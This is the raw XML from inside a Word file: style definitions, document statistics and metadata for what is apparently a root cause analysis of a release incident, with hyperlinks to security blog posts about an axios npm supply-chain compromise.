  <w:style w:type="paragraph" w:customStyle="1" w:styleId="customer-impact1">
    <w:name w:val="customer-impact1"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:sz="24" w:space="15" w:color="DC3545"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="F8D7DA"/>
      <w:spacing w:before="300" w:after="300"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="preventive1">
    <w:name w:val="preventive1"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:sz="24" w:space="15" w:color="28A745"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
      <w:spacing w:before="300" w:after="300"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="timeline-item1">
    <w:name w:val="timeline-item1"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:sz="18" w:space="15" w:color="3498DB"/>
      </w:pBdr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:ind w:left="150"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00255F03"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>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PreformattedText">
    <w:name w:val="Preformatted Text"/>
    <w:basedOn w:val="Normal"/>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epsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/security/blog/2026/04/01/mitigating-the-axios-npm-supply-chain-compromi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12</Pages>
  <Words>3360</Words>
  <Characters>22117</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>564</Lines>
  <Paragraphs>315</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>25189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root cause analysis informer 2025 2 5 release inci</dc:title>
  <dc:subject/>
  <dc:creator>Andrea Vega</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Madhavi Chandra</cp:lastModifiedBy>
  <cp:revision>91</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-20T19:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-09T18:23:00Z</dcterms:modified>
  <dc:language>en-US</dc:language>
</cp:coreProperties>
</file>